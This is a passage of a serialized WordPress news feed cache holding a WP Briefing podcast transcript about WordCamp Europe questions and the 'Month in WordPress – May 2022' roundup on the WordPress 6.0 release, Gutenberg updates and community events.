WCEU\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"https://wordpress.org/news/2022/06/episode-33-some-important-questions-from-wceu/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 13 Jun 2022 11:01:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=13005\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:165:\"WordPress Executive Director Josepha Haden Chomphosy covers some important questions from WordCamp Europe on this special episode of the WordPress Briefing podcast. \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2022/06/WP-Briefing-033.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:13788:\"\n<p>In the thirty-third episode of the WordPress Briefing, hear Josepha Haden Chomphosy recap important questions from WordCamp Europe, and a selection of Contributor Day interviews. </p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em><br></p>\n\n\n\n<h2 id=\"credits\">Credits</h2>\n\n\n\n<ul><li>Editor: <a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a></li><li>Logo: <a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a></li><li>Production: <a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a></li><li>Production Assistance: <a href=\"https://profiles.wordpress.org/priethor/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/priethor/\">Héctor Prieto</a></li><li>Special Guests: <a href=\"https://profiles.wordpress.org/milana_cap/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/milana_cap/\">Milana Cap</a>, <a href=\"https://profiles.wordpress.org/daugis/\">Daugirdas Jankus</a>, and <a href=\"https://profiles.wordpress.org/desrosj/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a></li><li>Song: Fearless First by Kevin MacLeod</li></ul>\n\n\n\n<h2>References</h2>\n\n\n\n<ul><li><em><a href=\"https://en.wikipedia.org/wiki/L%27esprit_de_l%27escalier\" data-type=\"URL\" data-id=\"https://en.wikipedia.org/wiki/L%27esprit_de_l%27escalier\">L&#8217;esprit de l&#8217;escalier</a></em></li><li><a href=\"https://make.wordpress.org/core/2022/05/20/core-editor-improvement-creating-containing-containers/\" data-type=\"URL\">Flexbox Layout Blocks</a></li><li><a href=\"https://make.wordpress.org/training/2022/03/10/recap-of-training-team-meetings-march-8-and-10-2022/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/training/2022/03/10/recap-of-training-team-meetings-march-8-and-10-2022/\">Translating Content on Learn WordPress</a></li><li><a href=\"https://make.wordpress.org/training/handbook/workshops/workshop-subtitles-and-transcripts/translating-subtitles/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/training/handbook/workshops/workshop-subtitles-and-transcripts/translating-subtitles/\">Translating Subtitles</a></li><li><a href=\"https://josepha.blog/2020/01/15/fostering-collaboration-across-cultures/\" data-type=\"URL\" data-id=\"https://josepha.blog/2020/01/15/fostering-collaboration-across-cultures/\">Collaboration Across Cultures</a> (Blog)</li><li><a href=\"https://www.youtube.com/watch?v=8MzJCT2BVV0\" data-type=\"URL\" data-id=\"https://www.youtube.com/watch?v=8MzJCT2BVV0\">Collaboration Across Cultures</a> (YouTube Video)</li><li><a href=\"https://europe.wordcamp.org/2023/call-for-organisers/\" data-type=\"URL\" data-id=\"https://europe.wordcamp.org/2023/call-for-organisers/\">WordCamp Europe Athens: Call for Organizers</a></li><li><a href=\"https://twitter.com/matias_ventura/status/1534602705456480260\" data-type=\"URL\" data-id=\"https://twitter.com/matias_ventura/status/1534602705456480260\">6.1 Release Planning Twitter Thread</a></li><li><a href=\"https://make.wordpress.org/core/2022/06/04/roadmap-to-6-1/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/core/2022/06/04/roadmap-to-6-1/\">6.1 Release Planning Roadmap Post</a></li><li><a href=\"https://make.wordpress.org/meetings/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/meetings/\">Make WordPress Meetings Calendar</a></li></ul>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-13005\"></span>\n\n\n\n<p>[<strong>Daugirdas Jankus </strong>00:00:04]&nbsp;</p>\n\n\n\n<p>Honestly, it&#8217;s not a secret. It&#8217;s a big part of our business. And I think it&#8217;s like WordPress is a big part of all the hosting company, company’s, businesses, you know? So for us, it is like, we want to make it better. We want to give back. We want to understand, you know, where we can contribute the most. And we see it as a, you know, win, win, win situation for everyone, for clients, for the whole ecosystem.</p>\n\n\n\n<p>And for us as a business, of course!</p>\n\n\n\n<p>[<strong>Milana Cap </strong>00:00:32]&nbsp;</p>\n\n\n\n<p>My favorite WordPress component is WP CLI. That&#8217;s my crush, haha, because I love terminal. I love doing it. I&#8217;m not a really UI type of person, I get lost in UI. But in terminal, you just type command and it does what you want. And a WP CLI is much more powerful than WordPress dashboard. You can do so many things there and you can have fun.</p>\n\n\n\n<p>Uh, so that&#8217;s my go-to tool!</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:01:10]&nbsp;</p>\n\n\n\n<p>Hello everyone. And welcome to the WordPress Briefing– the podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks. I&#8217;m your host, Josepha Haden Chomphosy.</p>\n\n\n\n<p>Here we go!</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:01:36]&nbsp;</p>\n\n\n\n<p>Many, many people were at WordCamp Europe a couple of weeks ago. And at the end, Matt and I closed out the event sessions with a little question and answer time from the community. I was excited to see everyone and excited to answer their questions. But as with all spur of the moment answers, I experienced this <em>l&#8217;esprit de l&#8217;escalier </em>and I found that there were a few things that I would have answered a little more completely if I had taken more than two seconds to think about them.</p>\n\n\n\n<p>So today I&#8217;m going to augment some of the answers from that session with a little more context and clarity. There was a question from Laura Byrne about favorite blocks in recent WordPress releases. And given that I was exclusively holding WordCamp Europe information in my brain at the time, I couldn&#8217;t think of which block was my favorite. While I was sitting there on that stage,</p>\n\n\n\n<p>I realized that one of my favorite things about WordPress’s 6.0 release, like Matt, wasn&#8217;t really a block, but it was a functional workflow sort of thing. So my favorite thing was the ability to lock blocks, but I mean, the question was about favorite blocks. And so I do know that some of the most anticipated blocks are the Flexbox layout blocks. Whew. What a sentence!</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:02:46]</p>\n\n\n\n<p>Try to say that three times fast! Those blocks are the Flexbox layout blocks, they are sort of shortcuts that show up when you&#8217;re selecting multiple blocks and allow for easy side-by-side layouts. I&#8217;m not explaining it in a way that does it much justice, but I will share a link in the show notes that has more information and you can kind of see how empowering that particular block is in the block editor.</p>\n\n\n\n<p>The next question I wanted to give a little more context to came from Courtney Robertson. She asked about how to make translated content more readily available on learn.wordpress.org. My answer was pretty far ranging and talked about why it&#8217;s harder to commit to prioritizing that over, for my example, translating WordPress core.&nbsp;</p>\n\n\n\n<p>But I also understand that there are people who want to help and just need someone to point them in the right direction. And so I want to be clear that it is possible to have workshops in any language on learn.wordpress.org right now. We just don&#8217;t have a lot of people contributing those translations.</p>\n\n\n\n<p>So there are conversations going on right now in the training team about using Glotpress on learn.wordpress.org, and also how to translate subtitles. So, if you are looking for ways to give back through translation and training is an important kind of area of your focus. I will have links to both of those things in the show notes as well.</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:04:11]</p>\n\n\n\n<p>I also gave a quick answer, uh, after this question about how hard it is to recognize contributions that are separate from a major event or major release. In this case, when I say recognize, that&#8217;s recognized as in thank, not recognize as in, know it exists. In case it&#8217;s not clear why that was connected, why that answer was connected to the question, training materials are self-serve and not always specific to individual releases of WordPress.</p>\n\n\n\n<p>So that means the maintenance of any content around training happens routinely over the course of time, rather than because of a specific release or a WordCamp. What sometimes can make it a little harder to entice people to join us in that work.&nbsp;</p>\n\n\n\n<p>And now the third question I&#8217;d like to tackle is the one that came from Megan Rose. She asked how we can encourage better diversity as we go back to in-person events. My answer was more about the big picture, program-wide work that has been done and specific awarenesses that I, as a leader, have been keeping top of mind. That answer is still true and is still important, but again, it doesn&#8217;t really help anyone who&#8217;s wondering how they can show up today in their own communities, and do the hard work of fostering an inclusive space there so that we can confidently welcome more diverse voices together.&nbsp;</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:05:27]</p>\n\n\n\n<p>A great place to start is to have conversations with people who aren&#8217;t like you and really listen. Also recognizing that we all come from different backgrounds that give us more or less opportunity and always be asking yourself, who is missing from this conversation and why, how can I find them and invite them into our own WordPress spaces?</p>\n\n\n\n<p>If that all kind of feels right up your alley, I would check out the show notes. I&#8217;ll have some links in there to the community team’s site, as well as a few posts that will help you to explore that a bit further as well.&nbsp;</p>\n\n\n\n<p>There were also a couple of questions about market share slash usage of WordPress, and Five for the Future that I really do want to answer, but as I was writing up the context and just kind of exploring the questions that people were raising, it turned out to really be quite a big set of answers.</p>\n\n\n\n<p>So I will do those in either two separate episodes of their own or one surprisingly long, for me, episode. And so there you have it, a lightning round, deep dive on a few questions from WordCamp Europe.</p>\n\n\n\n<p>[<strong>Jonathan Desrosiers </strong>00:06:41]&nbsp;</p>\n\n\n\n<p>Yeah, it&#8217;s definitely great to be back in person. Um, it&#8217;s been a long two years, two or three years for a lot of people and it&#8217;s, it&#8217;s, it&#8217;s great that we&#8217;re such an asynchronous community and we can all stay connected online through Slack and different means. Um, but there are some things that you can&#8217;t replace, like making friends with people and learning people&#8217;s demeanors and having some discussions in person that you can&#8217;t replace.</p>\n\n\n\n<p>And so, uh, I&#8217;m really excited to see people I haven&#8217;t seen in a long time. Meet new people and, um, you know, have some of those discussions here today in Portugal.</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:07:21]&nbsp;</p>\n\n\n\n<p>Which then brings us to our small list of big things.&nbsp;</p>\n\n\n\n<p>If you missed the announcement, WordCamp Europe will be in Athens next year. And the call for organizers is open already. It&#8217;s an experience that is absolutely irreplaceable. So I&#8217;ll link to that in the show notes, in case you&#8217;ve always wanted to give back to WordPress that way.</p>\n\n\n\n<p>The second thing on my list is that work on the next major release of WordPress is already underway. There is a post with roadmap info that was published recently, as well as a slightly more casual thread on Twitter. I&#8217;ve linked both of those in the show notes, so that you have some concept of what it is that we are aiming for in 6.1, and also a concept of where to go to get started working on it if that&#8217;s what you feel like doing, uh, for the next three to four months– 120 days, roughly.</p>\n\n\n\n<p>Uh, and finally. This is less of like a thing to be aware of in the next two weeks and kind of a little WordPress project tool tip. Did you know that we have a calendar that shows all meetings for all teams all week long? It will make you feel tired by the amount of work that gets done in the WordPress project every week, but it&#8217;s right there on make.wordpress.org/meetings.</p>\n\n\n\n<p>So you never have to wonder where folks are meeting to talk about things ever again. And that my friends is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.</p>\n\n\n\n<p>[<strong>Santana Inniss &amp; Héctor Prieto </strong>00:09:11]&nbsp;</p>\n\n\n\n<p>Hello! Mic test. One, two, one, two.&nbsp;</p>\n\n\n\n<p>We are testing the USB microphone. Let&#8217;s hope we&#8217;re using it actually.&nbsp;</p>\n\n\n\n<p>I think so. I think so.&nbsp;</p>\n\n\n\n<p>Yes. Because now I am far, and now I am much closer to the microphone. Yes.&nbsp;</p>\n\n\n\n<p>And I am sitting in the same spot.&nbsp;</p>\n\n\n\n<p>Good. Hello?&nbsp;</p>\n\n\n\n<p>Hello!&nbsp;</p>\n\n\n\n<p>Mic test one, two.</p>\n\n\n\n<p>Mic test one, two.&nbsp;</p>\n\n\n\n<p>[record scratching sound effect]</p>\n\n\n\n<p>[laughter]</p>\n\n\n\n<p>And, close.</p>\n\n\n\n<p>Mic check.&nbsp;</p>\n\n\n\n<p>Mic check.&nbsp;</p>\n\n\n\n<p>[record scratching sound effect]</p>\n\n\n\n<p>I&#8217;m close to the mic. I&#8217;m far from the mic.&nbsp;</p>\n\n\n\n<p>I&#8217;m far from the mic. Wow.</p>\n\n\n\n<p>Not so far.</p>\n\n\n\n<p>[laughter]</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13005\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"The Month in WordPress – May 2022\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2022/06/the-month-in-wordpress-may-2022/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Jun 2022 11:35:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:18:\"month in wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=12993\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:346:\"WordPress has a lot to celebrate this month. The newest release “Arturo” is here. WordPress turned 19 years old last week. And WordCamp Europe, the first in-person flagship WordCamp in two years, is starting today in Porto, Portugal. Read on to learn more about these and other exciting news around WordPress! Say hello to WordPress [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"rmartinezduque\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:12516:\"\n<p>WordPress has a lot to celebrate this month. The newest release “Arturo” is here. WordPress turned 19 years old last week. And WordCamp Europe, the first in-person flagship WordCamp in two years, is starting today in Porto, Portugal. Read on to learn more about these and other exciting news around WordPress!</p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<h2>Say hello to WordPress 6.0 “Arturo”</h2>\n\n\n\n<p><strong>WordPress 6.0 “Arturo” was released on May 24, 2022</strong>. Named in honor of the Latin jazz musician Arturo O’Farrill, the awaited release brings more customization tools and numerous updates to make the site-building experience more intuitive.</p>\n\n\n\n<p>Check out the <a href=\"https://youtu.be/oe452WcY7fA\">WordPress 6.0 video</a> and the <a href=\"https://wordpress.org/news/2022/05/arturo/\">announcement post</a> for an overview of the most important changes. Interested in knowing more about the features that will help you build with and extend WordPress? Then the WordPress 6.0 <a href=\"https://make.wordpress.org/core/2022/05/03/wordpress-6-0-field-guide/\">Field Guide</a> might be for you.</p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" class=\"youtube-player\" width=\"600\" height=\"338\" src=\"https://www.youtube.com/embed/oe452WcY7fA?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-US&#038;autohide=2&#038;wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation\"></iframe>\n</div></figure>\n\n\n\n<p>Over 500+ people in 58+ countries made WordPress 6.0 possible – Thank you!</p>\n\n\n\n<div class=\"is-layout-flex wp-block-buttons\">\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link\" href=\"https://wordpress.org/download/\"><strong>Download WordPress 6.0</strong></a></div>\n</div>\n\n\n\n<h2>Happy 19th birthday, WordPress!</h2>\n\n\n\n<p>Time flies, doesn&#8217;t it? Believe it or not, May 27 marked the 19th anniversary of WordPress’ first release! To celebrate, the community put together <a href=\"https://wp19.day/\">a special site</a> (wp19.day) where contributors shared thoughts, videos, live shows, and more.</p>\n\n\n\n<p>You can still join the fun using the hashtag #WP19Day on social media, or even contribute photos of the swag you used to celebrate to the <a href=\"https://wordpress.org/photos/\">WordPress Photo Directory</a>.</p>\n\n\n\n<div class=\"is-layout-flex wp-block-buttons\">\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/marketing/2022/04/01/grow-your-story-on-wordpress/\"><strong><strong><strong>If you haven&#8217;t yet, this is also a great opportunity to share your WordPress story. Visit the #GrowYourStoryWP initiative to learn more – We’d love to hear from you.</strong></strong></strong></a></div>\n</div>\n\n\n\n<h2>New in Gutenberg</h2>\n\n\n\n<p>Two new versions of Gutenberg were released last month:</p>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/core/2022/05/12/whats-new-in-gutenberg-13-2-may-11/\">Gutenberg 13.2</a> shipped on May 11, 2022, and brings a new API to save editor preferences on the server, visual guides for padding and margins, and improvements to the Comment block.</li><li><a href=\"https://make.wordpress.org/core/2022/05/26/whats-new-in-gutenberg-13-3-0-may-25/\">Gutenberg 13.3</a> comes with a new Table of Contents block and a number of enhancements to existing blocks to provide more ways to display content, among other highlights. It was released on May 25, 2022.</li></ul>\n\n\n\n<div class=\"is-layout-flex wp-block-buttons\">\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/tag/gutenberg-new/\"><strong><strong>Follow the </strong><strong>#gutenberg-new</strong><strong> posts for more details on the latest updates.</strong></strong></a></div>\n</div>\n\n\n\n<h2>Team updates: Five for the Future, guidelines for in-person regional WordCamps, and more</h2>\n\n\n\n<ul><li>Following an earlier discussion on in-person regional WordCamps, the Community team announced new <a href=\"https://make.wordpress.org/community/2022/05/23/regional-in-person-wordcamps-going-forward/\">guidelines</a> for these WordPress events.</li><li>The Five for the Future (5ftF) initiative is key to ensuring the future of the WordPress project. As part of the ongoing efforts to improve this initiative, Executive Director Josepha Haden suggested a <a href=\"https://make.wordpress.org/project/2022/05/20/defining-five-for-the-future-pledges-contributions/\">definition</a> for 5ftF pledges and contributions.</li><li>Tonya Mork posted a summary of the <a href=\"https://make.wordpress.org/test/2022/05/31/core-test-stats-for-wordpress-6-0/\">core test stats for WordPress 6.0</a>.</li><li>The Meta and Theme Review teams shared an update on the work done over the past year to <a href=\"https://make.wordpress.org/meta/2022/05/23/theme-reviews-improvements/\">improve the theme review process</a>. As a result, the average time for themes to be reviewed has decreased by 90%.</li><li>Josepha Haden kicked off a discussion post to gather feedback on the <a href=\"https://make.wordpress.org/project/2022/05/20/discussion-contrib-handbook-part-3/\">Community Code of Conduct</a> section of the new <a href=\"https://make.wordpress.org/updates/2021/03/16/proposal-a-wordpress-project-contributor-handbook/\">Contributor Handbook</a>.</li><li>On a similar note, the Community team created a new <a href=\"https://make.wordpress.org/updates/2022/05/26/announcement-incident-response-training/\">Incident Response Training</a>. The course, which is live on <a href=\"https://learn.wordpress.org/course/incident-response-team-training/\">Learn WordPress</a> and considered a work in progress, addresses how WordPress contributors take and respond to code of conduct reports.</li><li>The Training team published new lesson plans, workshops, courses, and Social Learning Spaces on Learn WordPress. <a href=\"https://make.wordpress.org/updates/2022/05/01/whats-new-on-learnwp-in-april-2022/\">See what’s new</a>.</li><li>The #WPDiversity working group organized several <a href=\"https://make.wordpress.org/community/2022/05/06/report-allyship-and-diverse-speaker-workshops-april-2022/\">Allyship and Diverse Speaker Workshops</a> in April. Attendees reported a 40% increase in public speaking confidence after attending the Speaker workshops. <a href=\"https://make.wordpress.org/community/tag/wpdiversity/\">Stay tuned</a> for the next events!</li><li>A <a href=\"https://make.wordpress.org/test/2022/05/30/fse-program-rallying-recipe-reviewers-summary/\">summary</a> of the 14th testing call of the Full Site Editing (FSE) Outreach program – “Rallying Recipe Reviewers” was recently published.</li><li>You can also find <a href=\"https://make.wordpress.org/core/2022/05/31/high-level-feedback-from-the-fse-outreach-program-may-2022/\">high-level feedback on the FSE Program</a> in this May 2022 post.</li><li>Learn more about the <a href=\"https://make.wordpress.org/design/2022/05/23/design-share-may-9-20/\">projects</a> the Design team contributed to over the past month.</li><li>Anne McCarthy hosted a Hallway Hangout to talk about various FSE pull requests and designs. The recording is available in <a href=\"https://make.wordpress.org/test/2022/05/25/hallway-hangout-discussion-on-full-site-editing-issues-prs-designs-25-may/\">this post</a>. </li><li>The May editions of the <a href=\"https://make.wordpress.org/community/2022/05/20/meetup-organizer-newsletter-may-2022/\">Meetup Organizer Newsletter</a> and the <a href=\"https://make.wordpress.org/polyglots/2022/05/31/polyglots-monthly-newsletter-may-2022/\">Polyglots Monthly Newsletter</a> were published.</li><li>The latest edition of People of WordPress features the story of <a href=\"https://wordpress.org/news/2022/05/people-of-wordpress-dee-teal/\">Dee Teal</a>.</li></ul>\n\n\n\n<div class=\"is-layout-flex wp-block-buttons\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link\" href=\"https://wordpress.org/news/2022/05/episode-31-open-source-accessibility-celebrating-global-accessibility-awareness-day-with-guest-joe-devon/\"><strong><strong>The </strong><strong>thirty-first episode of WP Briefing</strong><strong> celebrated Global Accessibility Awareness Day (May 19) with guest Joe Devon.</strong></strong></a></div>\n</div>\n\n\n\n<h2>Open feedback/testing calls</h2>\n\n\n\n<ul><li>The Core team is working on ​​an experimental pull request (PR) to implement <a href=\"https://make.wordpress.org/core/2022/05/27/block-font-sizes-and-fluid-typography/\">fluid typography</a>. They welcome feedback on design, functionality, and API.</li><li>Version 20.0 of WordPress for <a href=\"https://make.wordpress.org/mobile/2022/05/31/call-for-testing-wordpress-for-android-20-0/\">Android</a> and <a href=\"https://make.wordpress.org/mobile/2022/05/30/call-for-testing-wordpress-for-ios-20-0/\">iOS</a> is now available for testing.</li><li>Were you involved in the WordPress 6.0 release? Take some time to reflect on what you learned and participate with your feedback in this <a href=\"https://make.wordpress.org/core/2022/05/27/wordpress-6-0-arturo-retrospective/\">retrospective</a>.</li></ul>\n\n\n\n<div class=\"is-content-justification-center is-layout-flex wp-container-5 wp-block-buttons\">\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/project/2022/05/23/request-for-feedback-recording-five-for-the-future-contributions/\"><strong><strong><strong>Angela Jin has asked for feedback to help identify and record Five for the Future contributions from Make teams. </strong><strong>Share your ideas in this post</strong><strong>.</strong></strong></strong></a></div>\n</div>\n\n\n\n<h2>WordCamp Europe is here!</h2>\n\n\n\n<ul><li>WordPress Foundation’s Kim Parsell Memorial Scholarship returns for WordCamp US 2022. <a href=\"https://us.wordcamp.org/2022/the-kim-parsells-memorial-scholarship-apply-now/\">Visit this post</a> for more information.</li><li>The WordCamp US <a href=\"https://us.wordcamp.org/2022/call-for-sponsors-open-wcus/\">Call for Sponsors</a> is now open.</li><li>Two more in-person WordCamps are happening this month:<ul><li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1f5-1f1f1.png\" alt=\"🇵🇱\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://warsaw.wordcamp.org/2022/\">WordCamp Warsaw</a>, Poland on June 11-12, 2022</li><li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1fa-1f1f8.png\" alt=\"🇺🇸\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://montclair.wordcamp.org/2022/\">WordCamp Montclair</a>, NJ, USA on June 25, 2022</li></ul></li><li>The WordPress community is meeting today at <a href=\"https://europe.wordcamp.org/2022/\">WordCamp Europe</a> (June 2-4) in Porto, Portugal. This edition celebrates the return to in-person events and the 10th anniversary of WCEU. For everyone heading to Porto, have a great WordCamp!</li></ul>\n\n\n\n<div class=\"is-content-justification-center is-layout-flex wp-container-6 wp-block-buttons\">\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link\" href=\"https://wordpress.org/news/2022/05/episode-32-an-open-source-reading-list/\"><strong><strong><strong><strong>Traveling to WCEU? Check out Josepha Haden’s </strong><strong>open source reading list</strong><strong> for interesting reads while you travel!</strong></strong></strong></strong></a></div>\n</div>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<p><strong><em><strong><em>Have a story that we could include in the next issue of The Month in WordPress? Let us know by filling out </em></strong><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><strong><em>this form</em></strong></a><strong><em>.</em></strong></em></strong></p>\n\n\n\n<p><em>The following folks contributed to this Month in WordPress: <a href=\'https://profiles.wordpress.org/rmartinezduque/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>rmartinezduque</a>, <a href=\'https://profiles.wordpress.org/laurlittle/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>laurlittle</a>, <a href=\'https://profiles.wordpress.org/harishanker/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>harishanker</a></em>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"12993\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			